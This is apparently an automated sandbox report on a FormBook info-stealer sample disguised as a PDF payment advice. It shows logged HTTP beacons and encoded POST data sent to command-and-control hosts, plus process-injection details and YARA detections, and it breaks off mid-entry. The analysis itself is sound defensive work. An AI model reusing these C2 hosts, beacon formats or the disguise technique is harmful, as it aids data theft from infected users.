                                                            Dec 5, 2024 19:41:50.233740091 CET1853OUTPOST /ipd6/ HTTP/1.1
                                                            Host: www.questmatch.pro
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Connection: close
                                                            Content-Length: 1249
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.questmatch.pro
                                                            Referer: http://www.questmatch.pro/ipd6/
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Data Raw: 77 56 62 30 3d 42 43 33 57 72 31 7a 44 44 6d 75 5a 56 35 4e 59 65 68 59 54 65 63 68 79 4b 58 71 4a 30 4c 44 41 64 74 32 4f 71 7a 78 70 34 79 55 5a 61 66 6d 56 37 4a 5a 71 4e 78 55 77 64 62 39 37 43 55 6b 63 6e 46 35 68 31 31 46 6d 71 52 75 57 42 4b 51 57 6d 4e 75 39 70 63 39 51 69 7a 6f 6e 78 72 43 53 51 50 58 68 74 54 68 6b 37 50 56 67 30 45 33 64 77 6a 57 56 4f 49 31 66 58 54 34 2f 4c 37 5a 4b 6a 72 5a 4f 76 6a 42 66 69 6e 31 6e 70 33 4f 64 70 36 39 64 44 63 58 61 72 41 37 2f 45 57 63 6b 70 72 5a 30 4a 4e 71 39 54 39 59 57 30 78 69 31 34 64 65 5a 6f 34 36 56 30 75 45 52 31 69 39 39 63 65 43 4f 39 57 4f 47 42 70 48 78 76 2b 52 4b 6d 66 6c 33 35 38 6a 77 67 55 39 57 6c 79 6c 4e 59 46 6b 6c 31 6b 59 65 79 6b 63 62 31 5a 50 47 6a 6c 74 46 6a 44 59 50 54 32 33 30 77 59 2b 45 34 68 4e 49 57 6a 30 43 47 6d 63 70 56 73 55 56 67 53 57 4d 2f 43 38 79 72 73 47 6e 33 45 37 62 53 2f 6a 56 42 54 55 56 69 55 58 5a 71 54 4b 4a 38 35 6a 4c 61 68 5a 38 6f 68 63 46 6a 6b 78 31 53 6c 4f 37 5a 42 46 31 50 6c 73 2b 6e [TRUNCATED]
                                                            Data Ascii: wVb0=BC3Wr1zDDmuZV5NYehYTechyKXqJ0LDAdt2Oqzxp4yUZafmV7JZqNxUwdb97CUkcnF5h11FmqRuWBKQWmNu9pc9QizonxrCSQPXhtThk7PVg0E3dwjWVOI1fXT4/L7ZKjrZOvjBfin1np3Odp69dDcXarA7/EWckprZ0JNq9T9YW0xi14deZo46V0uER1i99ceCO9WOGBpHxv+RKmfl358jwgU9WlylNYFkl1kYeykcb1ZPGjltFjDYPT230wY+E4hNIWj0CGmcpVsUVgSWM/C8yrsGn3E7bS/jVBTUViUXZqTKJ85jLahZ8ohcFjkx1SlO7ZBF1Pls+ni/2uhWlHyQM+eHglFX1zp62GCK3s3p1xXJDTrTBn2/zIzAeUdklbTxcc7nOKoRF3l59Mh0KaCes8UEiXnCSdf9Y8yVX6iee3Fvy9rAAIkJy/948XhAB5gRoZP8ERMYn62qrgJA1hdMR+8Lwu42qgbcWaWTxjGd2Z5m7qYJzriROZ/t2Fgdrr36cxtlSlpozBkBWIQHI7CawRopve5FccNkJAu3M2B+GF00li6XVcC7UvBYh+nhNQ6HKSCB6V3Zl2pO+IGwX9cpXWMrA5ulhJ1/N26gwhbvIl3EGYfvvRODAv9sF2p9vPQfBBt0K3aMMxnSQb380uZvNveRgHQ94M+Vfw8854L8B66VKY7HnFWYW3tUexet7s2zCscWd5dIdPGL1OQj6B/OdVtydS2MUF950Qc2iNGURxwqGYi34KRXOb4iqAJfzkrxREsQxHN9M5oY3a9lu8WQ8tzrJ0DIWtEv8Rdv60SOtb0cGzEY9gnfe9cxh8aHF/51wMW42p3Boq2uh8BpCKew3S/CuJBjeylZubrsf2JJXMCVf9uMJ/CdrgC8bRDOhkGLN3BgFQ5S1GIX7QXVIeSADgl90tTRc6M4aWKPzoiHxPAWsdwnwfgy3ix4OdH7TX7iGOXQsdNzgtICP7wM3OsgnO1yfoO9H9/SYf4O12gwF0hf [TRUNCATED]
                                                            Dec 5, 2024 19:41:51.521243095 CET1236INHTTP/1.1 404
                                                            Date: Thu, 05 Dec 2024 18:41:51 GMT
                                                            Content-Type: application/json
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Origin
                                                            Vary: Access-Control-Request-Method
                                                            Vary: Access-Control-Request-Headers
                                                            X-Correlation-ID: 00ae388a-b313-47ca-9a23-b83dba651db1
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 1; mode=block
                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: 0
                                                            CF-Connecting-IP: 8.46.123.228
                                                            CF-IPCountry: US
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M9aJFqSdbRVOaOfHuCdgCn8hHQnO0xiiItL%2BLmjvtjqqzKaXT0Lp5dPslKDgAqIMKKxK4kSlYLuZLBbRRgbKxSq%2FMz7I673T5EySPH%2F%2B82RNrsFJkc0%2Fl7um%2FfCmXu09y3WkkCE%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8ed62c36b8cc8cc3-EWR
                                                            Content-Encoding: gzip
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1861&min_rtt=1861&rtt_var=930&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1853&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 62 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 24 8e 41 0e 82 30 14 05 af d2 bc 35 44 b0 88 d8 03 98 b0 51 13 dd 19 17 bf fc a2 c4 da 6f 4a 59 18 c3 dd 8d 61 3d 93 c9 7c 61 85 3f 30 61 f2 3e 83 8b 51 e2 08 f3 45 27 ec 60 aa a2 ca 10 e8 e5 60 70 90
                                                            Data Ascii: b5$A05DQoJYa=|a?0a>QE'``p
                                                            Dec 5, 2024 19:41:51.521261930 CET111INData Raw: a4 f6 32 05 46 06 76 89 06 3f c2 5c 71 10 f5 a0 c0 de 45 d5 ff a9 ea 25 aa d3 f1 7c 51 ab e1 cd f5 0a b7 f9 ef db e9 de 86 5e 96 74 8c ce 53 1a 24 b4 0c 83 a2 20 a7 9b 86 72 ab 4b 9d 57 db 8e f2 1d ad 75 6e 1b cd 96 ea 4d c9 b6 44 86 31 51 f7 bc
                                                            Data Ascii: 2Fv?\qE%|Q^tS$ rKWunMD1QDr;?J_\0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            24192.168.2.749995104.21.62.184806992C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 5, 2024 19:41:52.899048090 CET551OUTGET /ipd6/?wVb0=MAf2oATgQW2BddVfADsXf+wCIFqkr7SFGuPP0SlPqjR1OOKK8KBvL1kFaoovUHshjlod7xBKsGH7WboeoPfL5tpttEQTjebBZLDP1C5B1+B2izjL5y+kFvtZcDEbY8V81qhugw9f9kl5&0r=XzjtrBPP HTTP/1.1
                                                            Host: www.questmatch.pro
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Connection: close
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Dec 5, 2024 19:41:54.185230017 CET1236INHTTP/1.1 404
                                                            Date: Thu, 05 Dec 2024 18:41:54 GMT
                                                            Content-Type: application/json
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Origin
                                                            Vary: Access-Control-Request-Method
                                                            Vary: Access-Control-Request-Headers
                                                            X-Correlation-ID: b04cb7ed-e20f-48f9-a1b8-f817ed11d619
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 1; mode=block
                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: 0
                                                            CF-Connecting-IP: 8.46.123.228
                                                            CF-IPCountry: US
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=16mUn%2BnQ6z85E4qTw4H8mvkkDrJJqimcJzkNONcb%2Ba%2Bxhy0JLQ4%2Br%2BuTz5ofuarjhrkZIqPdZLMAmHQMZ2HeXRhYGpZwTpx5371JJbwVm2r37tqeIEFuKTZVSpzstHe05m%2BA2OE%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8ed62c4769ba42b8-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1767&min_rtt=1767&rtt_var=883&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=551&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 62 62 0d 0a 7b 22 62 6f 64 79 22 3a 6e 75 6c 6c 2c 22 65 72 72 6f 72 73 22 3a 7b 22 63 6f 64 65 22 3a 34 30 34 2c 22 6e 61 6d 65 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 2c 22 64 65 74 61 69 6c 73 22 3a 5b 22 4e 6f 20 68 61 6e 64 6c 65 72 20 66 6f 75 6e 64 20 66 6f 72 20 47 45 54 20 2f 69 70 64 36 2f 22 5d 7d 2c 22 64
                                                            Data Ascii: bb{"body":null,"errors":{"code":404,"name":"Not Found","details":["No handler found for GET /ipd6/"]},"d
                                                            Dec 5, 2024 19:41:54.185266972 CET92INData Raw: 65 62 75 67 49 6e 66 6f 22 3a 7b 22 63 6f 72 72 65 6c 61 74 69 6f 6e 49 64 22 3a 22 62 30 34 63 62 37 65 64 2d 65 32 30 66 2d 34 38 66 39 2d 61 31 62 38 2d 66 38 31 37 65 64 31 31 64 36 31 39 22 2c 22 73 74 61 63 6b 54 72 61 63 65 22 3a 6e 75 6c
                                                            Data Ascii: ebugInfo":{"correlationId":"b04cb7ed-e20f-48f9-a1b8-f817ed11d619","stackTrace":null}}0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            25192.168.2.74999666.29.137.10806992C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 5, 2024 19:41:59.925052881 CET814OUTPOST /hayl/ HTTP/1.1
                                                            Host: www.callyur.shop
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Connection: close
                                                            Content-Length: 217
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.callyur.shop
                                                            Referer: http://www.callyur.shop/hayl/
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Data Raw: 77 56 62 30 3d 32 73 6f 56 59 2f 42 43 4b 77 52 78 6f 36 52 37 6b 47 31 66 57 53 38 58 53 68 31 6b 61 78 44 68 56 65 78 72 54 57 47 49 52 4f 56 78 73 61 42 72 6b 4d 79 4b 53 37 43 43 4d 49 2f 31 71 54 42 4c 35 30 42 4e 6d 65 2f 33 6c 30 56 48 78 57 49 70 2f 56 45 75 66 44 42 73 37 35 61 69 38 72 4f 58 41 71 43 49 67 61 42 77 31 65 43 76 32 79 39 41 34 31 56 66 78 30 36 51 77 69 41 62 70 78 7a 48 45 62 6a 36 75 4f 55 70 47 63 71 6a 72 55 6b 2f 67 59 69 73 7a 6a 64 38 44 35 63 59 58 36 75 64 65 64 59 35 63 52 73 77 38 59 63 6a 54 4f 77 35 4c 66 68 31 57 37 38 73 6c 36 51 66 43 74 31 57 4f 5a 59 53 35 62 44 63 78 48 76 38 2f 6d 57 48 68 51 3d 3d
                                                            Data Ascii: wVb0=2soVY/BCKwRxo6R7kG1fWS8XSh1kaxDhVexrTWGIROVxsaBrkMyKS7CCMI/1qTBL50BNme/3l0VHxWIp/VEufDBs75ai8rOXAqCIgaBw1eCv2y9A41Vfx06QwiAbpxzHEbj6uOUpGcqjrUk/gYiszjd8D5cYX6udedY5cRsw8YcjTOw5Lfh1W78sl6QfCt1WOZYS5bDcxHv8/mWHhQ==
                                                            Dec 5, 2024 19:42:01.171619892 CET1236INHTTP/1.1 404 Not Found
                                                            keep-alive: timeout=5, max=100
                                                            content-type: text/html
                                                            transfer-encoding: chunked
                                                            content-encoding: gzip
                                                            vary: Accept-Encoding
                                                            date: Thu, 05 Dec 2024 18:42:00 GMT
                                                            server: LiteSpeed
                                                            x-turbo-charged-by: LiteSpeed
                                                            connection: close
                                                            Data Raw: 31 33 34 43 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f [TRUNCATED]
                                                            Data Ascii: 134CZJvLg!qCV's=pB<w?Kfm( o=|3q+{XV)w]vtOv,"fv?B0GVp]nyyG=56jZ:UMh/0K'wRUX7!rVY:s*^o/^VL?{fUm7n*/L-B/?.+0@{?{T`+1J`,(?{~61y??1?LuwK,D*yl]XqfG}g}z@Kf]e7{._",-0A_\WXqo_Pl!.\c=$?3gE/-"!=z`@]Wh-5@yFgj]IyPN>!Io<?=n*Ko:;j}vV Eoqhd[\=^f&32Q#b2zcQ>2/ol?yqXV>uY]!!_u&-)o>2bi3}`dmyG;].Q>P|}m_QmV8HrT~I*@W KYxSz125?VPtYCzug|J
                                                            Dec 5, 2024 19:42:01.171672106 CET1236INData Raw: a0 04 fe 66 86 37 7e fe 96 b8 4e 68 0e fe 94 80 40 fa 62 98 f1 88 cc bb 3f df 6c 73 8b da 9b e1 5e 79 79 56 5e 32 d4 c3 a0 70 63 10 eb 9a 1b 07 ec e7 f4 11 0b f8 4f fb 30 08 42 c7 71 d3 37 96 fa d1 be 5d e5 a7 0b b2 9f fd fa fd bc 37 f6 fb 15 b7
                                                            Data Ascii: f7~Nh@b?ls^yyV^2pcO0Bq7]7}E(CI?8T^4=u/"]G}~=q<^z?4GLRb ,d^s"g^a0oeZero>z9
                                                            Dec 5, 2024 19:42:01.171684027 CET1236INData Raw: e1 b2 c4 27 0b 58 34 da 70 d9 69 82 ef 72 73 3b b1 24 71 62 db 82 c6 38 9d ee 1a 66 3a cd d5 99 44 eb ac 38 ed 5a d4 0e 66 21 4d 65 49 74 c6 3b 02 8f a1 b4 de f2 c9 36 88 d4 12 31 47 c6 d8 10 36 ee 78 8c 25 68 b5 8f 75 9a 0b e6 e2 24 1a a5 f5 82
                                                            Data Ascii: 'X4pirs;$qb8f:D8Zf!MeIt;61G6x%hu$#|NpTqf76[J9^sNdK[(t&A\'a GXfSfQ*sam.!4_&;pBM=:rRy%9\[(n.ZAX-
                                                            Dec 5, 2024 19:42:01.171926022 CET672INData Raw: 6d 08 e0 d4 0a dd b4 e7 e3 32 ae d7 4d c0 d2 1b 1a 33 09 f1 d4 c1 84 de 2d 8a 8e f4 b3 93 bd 45 74 ce 5f 12 27 6c 81 0b 90 1e 0f 77 22 4c 34 99 3d 2a f6 11 85 d3 79 83 a7 07 6f 05 a7 81 36 26 51 10 9a e5 51 45 2c dd 6d a7 76 75 94 fa f5 0c 5d 91
                                                            Data Ascii: m2M3-Et_'lw"L4=*yo6&QQE,mvu]iR*1>[$3L#$Sh=rirW:37,*27t1=fa(7k^'rAsoFT2;i|2r.eHQb;q-neJ'q
                                                            Dec 5, 2024 19:42:01.171941042 CET852INData Raw: 45 cb f4 78 1b 51 16 89 46 67 d2 e3 b2 a1 6c 22 05 a5 1a 3a 39 57 b9 2d c8 7d 11 65 9a 5e aa 29 e1 8e e3 05 85 61 2c 3b ed f2 40 e4 14 25 0d 76 f6 64 17 69 72 2d 04 38 d3 92 b3 5d e5 ba cc 66 bc 3f f8 70 5b 9b a4 c1 c7 f8 ae 61 75 e5 04 db 30 d5
                                                            Data Ascii: ExQFgl":9W-}e^)a,;@%vdir-8]f?p[au08jLzCf?=ne?z;+=~+Z7ZKE|?w>:a3c,X^/s@=T^+L}'_/=;?.


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            26192.168.2.74999766.29.137.10806992C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 5, 2024 19:42:02.592125893 CET834OUTPOST /hayl/ HTTP/1.1
                                                            Host: www.callyur.shop
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Connection: close
                                                            Content-Length: 237
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.callyur.shop
                                                            Referer: http://www.callyur.shop/hayl/
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Data Raw: 77 56 62 30 3d 32 73 6f 56 59 2f 42 43 4b 77 52 78 6f 61 68 37 6c 68 5a 66 65 53 38 55 64 42 31 6b 44 42 44 39 56 65 31 72 54 58 44 56 52 34 46 78 73 34 5a 72 6c 49 47 4b 54 37 43 43 55 59 2f 77 33 6a 42 45 35 30 46 46 6d 61 6a 33 6c 77 31 48 78 55 67 70 2b 69 6f 74 66 54 42 75 79 5a 61 67 69 62 4f 58 41 71 43 49 67 61 46 65 31 65 61 76 33 47 35 41 71 45 56 63 33 45 36 66 6e 53 41 62 69 52 79 4f 45 62 6a 63 75 50 49 58 47 5a 32 6a 72 57 73 2f 67 71 4b 76 36 6a 63 33 4f 5a 64 4c 55 6f 2f 51 52 76 30 42 45 6a 38 61 2b 71 34 4a 57 34 78 62 52 39 74 5a 49 71 45 58 68 34 30 70 56 4c 6f 6a 4d 59 63 4b 30 35 33 39 75 77 4b 57 79 30 33 44 33 6f 42 63 50 62 6e 2b 47 38 32 56 6b 56 64 63 49 71 70 66 4e 79 34 3d
                                                            Data Ascii: wVb0=2soVY/BCKwRxoah7lhZfeS8UdB1kDBD9Ve1rTXDVR4Fxs4ZrlIGKT7CCUY/w3jBE50FFmaj3lw1HxUgp+iotfTBuyZagibOXAqCIgaFe1eav3G5AqEVc3E6fnSAbiRyOEbjcuPIXGZ2jrWs/gqKv6jc3OZdLUo/QRv0BEj8a+q4JW4xbR9tZIqEXh40pVLojMYcK0539uwKWy03D3oBcPbn+G82VkVdcIqpfNy4=
                                                            Dec 5, 2024 19:42:03.802515030 CET1236INHTTP/1.1 404 Not Found
                                                            keep-alive: timeout=5, max=100
                                                            content-type: text/html
                                                            transfer-encoding: chunked
                                                            content-encoding: gzip
                                                            vary: Accept-Encoding
                                                            date: Thu, 05 Dec 2024 18:42:03 GMT
                                                            server: LiteSpeed
                                                            x-turbo-charged-by: LiteSpeed
                                                            connection: close
                                                            Data Raw: 31 33 34 43 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f [TRUNCATED]
                                                            Data Ascii: 134CZJvLg!qCV's=pB<w?Kfm( o=|3q+{XV)w]vtOv,"fv?B0GVp]nyyG=56jZ:UMh/0K'wRUX7!rVY:s*^o/^VL?{fUm7n*/L-B/?.+0@{?{T`+1J`,(?{~61y??1?LuwK,D*yl]XqfG}g}z@Kf]e7{._",-0A_\WXqo_Pl!.\c=$?3gE/-"!=z`@]Wh-5@yFgj]IyPN>!Io<?=n*Ko:;j}vV Eoqhd[\=^f&32Q#b2zcQ>2/ol?yqXV>uY]!!_u&-)o>2bi3}`dmyG;].Q>P|}m_QmV8HrT~I*@W KYxSz125?VPtYCzug|J
                                                            Dec 5, 2024 19:42:03.802571058 CET1236INData Raw: a0 04 fe 66 86 37 7e fe 96 b8 4e 68 0e fe 94 80 40 fa 62 98 f1 88 cc bb 3f df 6c 73 8b da 9b e1 5e 79 79 56 5e 32 d4 c3 a0 70 63 10 eb 9a 1b 07 ec e7 f4 11 0b f8 4f fb 30 08 42 c7 71 d3 37 96 fa d1 be 5d e5 a7 0b b2 9f fd fa fd bc 37 f6 fb 15 b7
                                                            Data Ascii: f7~Nh@b?ls^yyV^2pcO0Bq7]7}E(CI?8T^4=u/"]G}~=q<^z?4GLRb ,d^s"g^a0oeZero>z9
                                                            Dec 5, 2024 19:42:03.802583933 CET1236INData Raw: e1 b2 c4 27 0b 58 34 da 70 d9 69 82 ef 72 73 3b b1 24 71 62 db 82 c6 38 9d ee 1a 66 3a cd d5 99 44 eb ac 38 ed 5a d4 0e 66 21 4d 65 49 74 c6 3b 02 8f a1 b4 de f2 c9 36 88 d4 12 31 47 c6 d8 10 36 ee 78 8c 25 68 b5 8f 75 9a 0b e6 e2 24 1a a5 f5 82
                                                            Data Ascii: 'X4pirs;$qb8f:D8Zf!MeIt;61G6x%hu$#|NpTqf76[J9^sNdK[(t&A\'a GXfSfQ*sam.!4_&;pBM=:rRy%9\[(n.ZAX-
                                                            Dec 5, 2024 19:42:03.802699089 CET672INData Raw: 6d 08 e0 d4 0a dd b4 e7 e3 32 ae d7 4d c0 d2 1b 1a 33 09 f1 d4 c1 84 de 2d 8a 8e f4 b3 93 bd 45 74 ce 5f 12 27 6c 81 0b 90 1e 0f 77 22 4c 34 99 3d 2a f6 11 85 d3 79 83 a7 07 6f 05 a7 81 36 26 51 10 9a e5 51 45 2c dd 6d a7 76 75 94 fa f5 0c 5d 91
                                                            Data Ascii: m2M3-Et_'lw"L4=*yo6&QQE,mvu]iR*1>[$3L#$Sh=rirW:37,*27t1=fa(7k^'rAsoFT2;i|2r.eHQb;q-neJ'q
                                                            Dec 5, 2024 19:42:03.803081036 CET852INData Raw: 45 cb f4 78 1b 51 16 89 46 67 d2 e3 b2 a1 6c 22 05 a5 1a 3a 39 57 b9 2d c8 7d 11 65 9a 5e aa 29 e1 8e e3 05 85 61 2c 3b ed f2 40 e4 14 25 0d 76 f6 64 17 69 72 2d 04 38 d3 92 b3 5d e5 ba cc 66 bc 3f f8 70 5b 9b a4 c1 c7 f8 ae 61 75 e5 04 db 30 d5
                                                            Data Ascii: ExQFgl":9W-}e^)a,;@%vdir-8]f?p[au08jLzCf?=ne?z;+=~+Z7ZKE|?w>:a3c,X^/s@=T^+L}'_/=;?.


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:13:38:57
                                                            Start date:05/12/2024
                                                            Path:C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe"
                                                            Imagebase:0x840000
                                                            File size:1'226'752 bytes
                                                            MD5 hash:C05461F24E430ECAF9B9106DE5CAFA70
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:8
                                                            Start time:13:39:01
                                                            Start date:05/12/2024
                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe"
                                                            Imagebase:0xbc0000
                                                            File size:46'504 bytes
                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1448964274.0000000006B20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1445662194.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1446968619.0000000004FA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:10
                                                            Start time:13:39:10
                                                            Start date:05/12/2024
                                                            Path:C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe"
                                                            Imagebase:0xbc0000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3093757528.00000000041C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            General

                                                            Target ID:11
                                                            Start time:13:39:11
                                                            Start date:05/12/2024
